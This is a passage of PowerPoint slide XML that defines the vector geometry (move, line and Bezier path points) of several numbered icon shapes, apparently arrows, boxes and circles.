          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425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2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8054" y="9818"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10800" y="7072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13547" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13547" y="9818"/>
                  <a:pt x="8054" y="9818"/>
                  <a:pt x="8054" y="9818"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15111" y="10002"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15083" y="9975"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15076" y="9968"/>
                  <a:pt x="15069" y="9960"/>
                  <a:pt x="15061" y="9953"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11184" y="6075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11177" y="6080"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11088" y="5968"/>
                  <a:pt x="10955" y="5891"/>
                  <a:pt x="10800" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10645" y="5891"/>
                  <a:pt x="10512" y="5968"/>
                  <a:pt x="10422" y="6080"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10416" y="6075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6539" y="9953"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6531" y="9960"/>
                  <a:pt x="6524" y="9968"/>
                  <a:pt x="6517" y="9975"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6489" y="10002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6495" y="10007"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6428" y="10091"/>
                  <a:pt x="6382" y="10193"/>
                  <a:pt x="6382" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="10580"/>
                  <a:pt x="6601" y="10800"/>
                  <a:pt x="6873" y="10800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14727" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14999" y="10800"/>
                  <a:pt x="15218" y="10580"/>
                  <a:pt x="15218" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="10193"/>
                  <a:pt x="15172" y="10091"/>
                  <a:pt x="15105" y="10007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15105" y="10007"/>
                  <a:pt x="15111" y="10002"/>
                  <a:pt x="15111" y="10002"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14236" y="13745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7364" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7364" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14236" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="12764"/>
                  <a:pt x="14236" y="13745"/>
                  <a:pt x="14236" y="13745"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14727" y="11782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6873" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6601" y="11782"/>
                  <a:pt x="6382" y="12001"/>
                  <a:pt x="6382" y="12273"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6382" y="14236"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="14508"/>
                  <a:pt x="6601" y="14727"/>
                  <a:pt x="6873" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14727" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14999" y="14727"/>
                  <a:pt x="15218" y="14508"/>
                  <a:pt x="15218" y="14236"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15218" y="12273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="12001"/>
                  <a:pt x="14999" y="11782"/>
                  <a:pt x="147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5" name="Shape 2715"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686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982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9818" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7855" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="0"/>
                  <a:pt x="7855" y="982"/>
                  <a:pt x="7855" y="982"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11782" y="982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13745" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13745" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="0"/>
                  <a:pt x="11782" y="982"/>
                  <a:pt x="11782" y="982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6" name="Shape 2716"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947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13745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7855" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7855" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13745" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="7855"/>
                  <a:pt x="13745" y="13745"/>
                  <a:pt x="13745" y="13745"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14236" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7364" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7092" y="6873"/>
                  <a:pt x="6873" y="7092"/>
                  <a:pt x="6873" y="7364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6873" y="14236"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="14508"/>
                  <a:pt x="7092" y="14727"/>
                  <a:pt x="7364" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14236" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14508" y="14727"/>
                  <a:pt x="14727" y="14508"/>
                  <a:pt x="14727" y="14236"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14727" y="7364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="7092"/>
                  <a:pt x="14508" y="6873"/>
                  <a:pt x="14236" y="6873"/>
                </a:cubicBezTo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7" name="Shape 2717"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="394927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1782"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14592" y="11782"/>
                  <a:pt x="14469" y="11837"/>
                  <a:pt x="14380" y="11926"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="15015"/>
                </a:ln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15015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7220" y="11926"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7131" y="11837"/>
                  <a:pt x="7008" y="11782"/>
                  <a:pt x="6873" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6601" y="11782"/>
                  <a:pt x="6382" y="12001"/>
                  <a:pt x="6382" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="12408"/>
                  <a:pt x="6437" y="12531"/>
                  <a:pt x="6526" y="12620"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10453" y="16547"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10542" y="16636"/>
                  <a:pt x="10664" y="16691"/>
                  <a:pt x="10800" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10936" y="16691"/>
                  <a:pt x="11058" y="16636"/>
                  <a:pt x="11147" y="16547"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15074" y="12620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15163" y="12531"/>
                  <a:pt x="15218" y="12408"/>
                  <a:pt x="15218" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="12001"/>
                  <a:pt x="14999" y="11782"/>
                  <a:pt x="14727" y="11782"/>
                </a:cubicBezTo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70" y="21123"/>
                  <a:pt x="21128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8" y="1133"/>
                  <a:pt x="20470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175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0" y="477"/>
                  <a:pt x="472" y="1133"/>
                  <a:pt x="175" y="1964"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="1250" y="19636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="175" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="472" y="20467"/>
                  <a:pt x="1130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8" name="Shape 2718"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="448253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927" y="982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5891" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3927" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="0"/>
                  <a:pt x="3927" y="982"/>
                  <a:pt x="3927" y="982"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11782" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13745" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13745" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="20618"/>
                  <a:pt x="11782" y="21600"/>
                  <a:pt x="11782" y="21600"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17673" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="20618"/>
                  <a:pt x="15709" y="21600"/>
                  <a:pt x="15709" y="21600"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="5891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="3927"/>
                  <a:pt x="20618" y="5891"/>
                  <a:pt x="20618" y="5891"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11147" y="5053"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11058" y="4964"/>
                  <a:pt x="10935" y="4909"/>
                  <a:pt x="10800" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10665" y="4909"/>
                  <a:pt x="10542" y="4964"/>
                  <a:pt x="10453" y="5053"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6526" y="8980"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6437" y="9069"/>
                  <a:pt x="6382" y="9192"/>
                  <a:pt x="6382" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="9599"/>
                  <a:pt x="6602" y="9818"/>
                  <a:pt x="6873" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7008" y="9818"/>
                  <a:pt x="7131" y="9764"/>
                  <a:pt x="7220" y="9674"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="6585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6585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14380" y="9674"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14469" y="9764"/>
                  <a:pt x="14592" y="9818"/>
                  <a:pt x="14727" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14998" y="9818"/>
                  <a:pt x="15218" y="9599"/>
                  <a:pt x="15218" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="9192"/>
                  <a:pt x="15163" y="9069"/>
                  <a:pt x="15074" y="8980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15074" y="8980"/>
                  <a:pt x="11147" y="5053"/>
                  <a:pt x="11147" y="5053"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="13745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="11782"/>
                  <a:pt x="20618" y="13745"/>
                  <a:pt x="20618" y="13745"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17673" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="0"/>
                  <a:pt x="15709" y="982"/>
                  <a:pt x="15709" y="982"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="9818"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="7855"/>
                  <a:pt x="20618" y="9818"/>
                  <a:pt x="20618" y="9818"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19636" y="20346"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19636" y="21420"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20469" y="21123"/>
                  <a:pt x="21129" y="20467"/>
                  <a:pt x="21426" y="19636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20350" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20177" y="19929"/>
                  <a:pt x="19931" y="20174"/>
                  <a:pt x="19636" y="20346"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="17673"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="15709"/>
                </a:ln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7855" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9818" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7855" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="20618"/>
                  <a:pt x="7855" y="21600"/>
                  <a:pt x="7855" y="21600"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9818" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7855" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7855" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="982"/>
                  <a:pt x="9818" y="0"/>
                  <a:pt x="9818" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20350" y="1964"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21426" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21129" y="1133"/>
                  <a:pt x="20469" y="477"/>
                  <a:pt x="19636" y="180"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="1254"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19931" y="1426"/>
                  <a:pt x="20177" y="1670"/>
                  <a:pt x="20350" y="1964"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="982" y="3927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="5891"/>
                  <a:pt x="982" y="3927"/>
                  <a:pt x="982" y="3927"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3927" y="21600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5891" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3927" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="20618"/>
                  <a:pt x="3927" y="21600"/>
                  <a:pt x="3927" y="21600"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13745" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11782" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13745" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="982"/>
                  <a:pt x="13745" y="0"/>
                  <a:pt x="13745" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="174" y="1964"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1250" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1423" y="1670"/>
                  <a:pt x="1669" y="1426"/>
                  <a:pt x="1964" y="1254"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1964" y="180"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1131" y="477"/>
                  <a:pt x="472" y="1133"/>
                  <a:pt x="174" y="1964"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="1250" y="19636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="174" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="472" y="20467"/>
                  <a:pt x="1131" y="21123"/>
                  <a:pt x="1964" y="21420"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1964" y="20346"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1669" y="20174"/>
                  <a:pt x="1423" y="19929"/>
                  <a:pt x="1250" y="19636"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="982" y="11782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="13745"/>
                  <a:pt x="982" y="11782"/>
                  <a:pt x="982" y="11782"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="982" y="7855"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="9818"/>
                  <a:pt x="982" y="7855"/>
                  <a:pt x="982" y="7855"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="982" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="17673"/>
                  <a:pt x="982" y="15709"/>
                  <a:pt x="982" y="157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19" name="Shape 2719"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414119" y="4482539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765" y="182"/>
                </a:move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cubicBezTo>
                  <a:pt x="12594" y="1105"/>
                  <a:pt x="12765" y="182"/>
                  <a:pt x="12765" y="182"/>
                </a:cubicBezTo>
                <a:close/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0" name="Shape 2720"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947380" y="4482539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14735"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8622" y="14735"/>
                  <a:pt x="6857" y="12973"/>
                  <a:pt x="6857" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6857" y="8627"/>
                  <a:pt x="8622" y="6865"/>
                  <a:pt x="10800" y="6865"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12978" y="6865"/>
                  <a:pt x="14743" y="8627"/>
                  <a:pt x="14743" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14743" y="12973"/>
                  <a:pt x="12978" y="14735"/>
                  <a:pt x="10800" y="14735"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="5881"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8078" y="5881"/>
                  <a:pt x="5871" y="8083"/>
                  <a:pt x="5871" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5871" y="13517"/>
                  <a:pt x="8078" y="15719"/>
                  <a:pt x="10800" y="15719"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13522" y="15719"/>
                  <a:pt x="15729" y="13517"/>
                  <a:pt x="15729" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15729" y="8083"/>
                  <a:pt x="13522" y="5881"/>
                  <a:pt x="10800" y="588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1" name="Shape 2721"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="4482539"/>
            <a:ext cx="278212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1" y="19771"/>
                  <a:pt x="14365" y="19991"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="20661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10801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4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1148" y="16559"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15092" y="12624"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15181" y="12535"/>
                  <a:pt x="15236" y="12412"/>
                  <a:pt x="15236" y="12276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15236" y="12004"/>
                  <a:pt x="15015" y="11784"/>
                  <a:pt x="14743" y="11784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14607" y="11784"/>
                  <a:pt x="14483" y="11839"/>
                  <a:pt x="14395" y="11928"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11293" y="15024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11293" y="5389"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11293" y="5117"/>
                  <a:pt x="11072" y="4897"/>
                  <a:pt x="10800" y="4897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10528" y="4897"/>
                  <a:pt x="10307" y="5117"/>
                  <a:pt x="10307" y="5389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10307" y="15024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7206" y="11928"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7117" y="11839"/>
                  <a:pt x="6993" y="11784"/>
                  <a:pt x="6857" y="11784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6585" y="11784"/>
                  <a:pt x="6364" y="12004"/>
                  <a:pt x="6364" y="12276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6364" y="12412"/>
                  <a:pt x="6419" y="12535"/>
                  <a:pt x="6508" y="12624"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10452" y="16559"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10541" y="16648"/>
                  <a:pt x="10664" y="16703"/>
                  <a:pt x="10800" y="16703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10936" y="16703"/>
                  <a:pt x="11059" y="16648"/>
                  <a:pt x="11148" y="16559"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18660" y="4854"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19411" y="4287"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19011" y="3759"/>
                  <a:pt x="18558" y="3264"/>
                  <a:pt x="18065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4"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6893" y="20882"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7514" y="21121"/>
                  <a:pt x="8160" y="21302"/>
                  <a:pt x="8814" y="21422"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8985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21553" y="9794"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20617" y="9880"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20644" y="10182"/>
                  <a:pt x="20659" y="10492"/>
                  <a:pt x="20659" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20659" y="11099"/>
                  <a:pt x="20645" y="11401"/>
                  <a:pt x="20619" y="11699"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21556" y="11784"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21585" y="11458"/>
                  <a:pt x="21600" y="11127"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21599" y="10462"/>
                  <a:pt x="21584" y="10124"/>
                  <a:pt x="21553" y="979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3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2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1" y="14642"/>
                  <a:pt x="19632" y="15184"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17446" y="18078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18081" y="18771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2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8924" y="1113"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8748" y="190"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8093" y="315"/>
                  <a:pt x="7448" y="501"/>
                  <a:pt x="6830" y="743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7173" y="1617"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7738" y="1396"/>
                  <a:pt x="8327" y="1226"/>
                  <a:pt x="8924" y="1113"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12594" y="1105"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12765" y="182"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12115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6473" y="1615"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15908" y="1264"/>
                  <a:pt x="15306" y="966"/>
                  <a:pt x="14686" y="726"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14347" y="1602"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14912" y="1821"/>
                  <a:pt x="15462" y="2094"/>
                  <a:pt x="15978" y="2413"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15978" y="2413"/>
                  <a:pt x="16473" y="1615"/>
                  <a:pt x="16473" y="1615"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3510" y="18800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4003" y="19247"/>
                  <a:pt x="4539" y="19650"/>
                  <a:pt x="5105" y="19997"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5599" y="19198"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5083" y="18881"/>
                  <a:pt x="4592" y="18513"/>
                  <a:pt x="4142" y="18105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4142" y="18105"/>
                  <a:pt x="3510" y="18800"/>
                  <a:pt x="3510" y="18800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1" y="4854"/>
